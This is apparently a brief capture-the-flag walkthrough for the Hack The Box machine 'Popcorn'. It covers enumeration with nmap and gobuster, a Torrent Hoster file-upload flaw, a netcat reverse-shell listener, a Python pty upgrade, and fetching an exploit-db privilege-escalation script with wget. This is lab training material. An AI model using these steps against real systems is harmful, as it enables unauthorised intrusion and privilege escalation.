Hack The Box: Popcorn

Difficulty: Medium Machine Creator: ch4p Tools Used:

NMAP Gobuster Searchsploit PHP Burp Suite Python

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC



We have verified that there is a web server we can start with scanning for directories in the website.

gobuster -u -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40



A searchsploit search shows that the Torrent Hoster webpage is vulnerable to uploads.

Torrent Hoster

Here I’ve uploaded a new logo for our kali torrent.

Burp Suite

I’m starting the burp suite by repeating the same process of uploading the screenshot while using burp as a proxy.

echo <Base64 Hash> |base64 -d > file

Exploit upload

Now we can start on uploading an exploit to this server.

Reverse Shell

We need to set up our local netcat listener

nc -lvnp 1234

In the url, we can execute netcat on the remote server by replacing the whoami with the netcat command

python -c ‘import pty; pty.spawn(“/bin/sh”)’


Privilege Escalation

ls -a

wget http://www.exploit-db.com/download/14339.sh

Exploitation Error

Python PTY Shells

https://github.com/infodox/python-pty-shells git clone https://github.com/infodox/python-pty-shells.git



#FileUploadVulnerabilty #RemoteCodeExecution